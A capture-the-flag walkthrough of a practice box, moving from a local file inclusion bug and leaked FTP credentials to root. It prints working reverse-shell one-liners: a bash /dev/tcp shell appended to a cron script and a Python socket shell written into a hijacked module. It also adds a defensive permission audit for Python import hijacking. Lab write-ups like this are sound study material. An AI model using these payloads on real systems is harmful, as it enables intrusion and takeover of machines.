Flag 1
Well, this blog was about some kind of placemat stuff. I didn't find anything interesting in its page source, but robots.txt was very useful for flag_1.

It says /flag_1.txt and /secret_file_do_not_read.txt are allowed for users to access.

I moved to flag_1.txt, and we got our first flag.
In the meantime, I did an nmap scan and found that the ftp and ssh ports are also open. Sadly, there was no anonymous login for ftp.

Flag 2

I also tried to move to /secret_file_do_not_read.txt, but it was forbidden. So, I came back to the main web page and visited those posts. The URL was like http://10.10.189.206/post.php?post=round.php .
This seems vulnerable to LFI. So, I tried some LFI payloads.

Boom…. the guess was correct. But there was no useful info. So, I tried to give /secret_file_do_not_read.txt to the post parameter.

Woooo…. we get the ftp user credentials so easily, and it's also telling us about where the files will be uploaded.

Now, I logged in as the ftp user with those credentials and downloaded the flag to my system.

Here, I got second flag.
Flag 3
I decided to upload a php-reverse-shell, started listening in another terminal and moved to http://10.10.189.206/post.php?post=/home/ftpuser/ftp/files/php-reverse-shell.php .
And I got a reverse connection and got second flag.

By searching for flag_3 using the find command, I got the third flag.
Flag 4
I did it in a similar way for the other flags and their locations. Flag_4 was in the toby user's directory. Before moving, I spawned an interactive python shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then I did sudo -l to see all the commands I can run as user toby.

Well, I was able to run all commands. So I switched user from www-data to toby.

Here we go for the fourth flag.
Flag 5
To find Flag 5, they gave a hint about cronjobs and the scripts directory under the toby user's directory. Well, it's a bash script named cow.sh, and I viewed that script. Basically, it was copying a cow.jpg image file from the mat user's directory to the tmp directory. So, if we add a bash reverse shell to the cow.sh script, we can easily gain access to the mat user.
echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/my_ip/port 0>&1"' >> file.sh

And I started listening on my localhost. ( nc )

Here we go… Flag_5 occupied.
Flag 6
Now, for flag_6, they gave a hint about python module hijacking. In the mat user's directory I found a script directory; it consists of 2 python files named cmd.py and will_script.py . Here, basically, will_script.py was making a call to cmd.py . And I had access to write the cmd.py file, not will_script.py . So, I overwrote that cmd.py file with a python reverse connection payload.
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.8.108.69',9898));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py


I started listening on my system and I executed the payload.

And here we go…. for the 6th flag.
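Seen from the defender's side, this step worked because Python puts the script's own directory first on its import path, so a cmd.py that another user can write to runs with the privileges of whoever runs will_script.py. The audit below is an added example, not code from the room or from this write-up; the function names and the temporary directory layout are constructed for illustration.

```python
import ast
import os
import stat
import tempfile

def local_imports(script_path):
    """Modules the script imports that resolve to .py files beside it."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    paths = (os.path.join(script_dir, n + ".py") for n in sorted(names))
    return [p for p in paths if os.path.isfile(p)]

def hijackable_imports(script_path):
    """Flag sibling modules that someone other than the script's owner can modify."""
    script_uid = os.stat(script_path).st_uid
    findings = []
    for module in local_imports(script_path):
        st = os.stat(module)
        reasons = []
        if st.st_uid != script_uid:
            reasons.append("owned by a different uid than the script")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("group- or world-writable")
        if reasons:
            findings.append((os.path.basename(module), reasons))
    return findings

def demo():
    """Constructed layout mirroring the page: will_script.py imports cmd.py."""
    with tempfile.TemporaryDirectory() as d:
        script, module = os.path.join(d, "will_script.py"), os.path.join(d, "cmd.py")
        with open(script, "w") as fh:
            fh.write("import os\nimport cmd\n")
        with open(module, "w") as fh:
            fh.write("# placeholder module\n")
        os.chmod(script, 0o644)
        os.chmod(module, 0o666)  # weak: any local user can rewrite it
        weak = hijackable_imports(script)
        os.chmod(module, 0o644)  # corrected: only the owner can write
        return weak, hijackable_imports(script)
```

The check covers file permissions only; a script directory that other users can write to allows the same module to be replaced, so its mode needs the same review.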
Flag 7
Now, for the 7th flag they gave ssh as the hint. I already knew there was an ssh service from the port scan. So, I searched for id_rsa using the find command, but there was no result. I also tried find / -type f -name *key* 2>/dev/null but it gave me a very lengthy result. So I decided to check directories manually and found a key in the /opt/backups directory. I started a python localhost server ( python3 -m http.server ) and downloaded that file to my PC.

The file was base64 encoded, so I decoded it and used it for the ssh connection. Finally, I got root….. and the 7th flag.
It was really a very good room for learners…….. I hope you guys find this useful…… Happy Hacking…….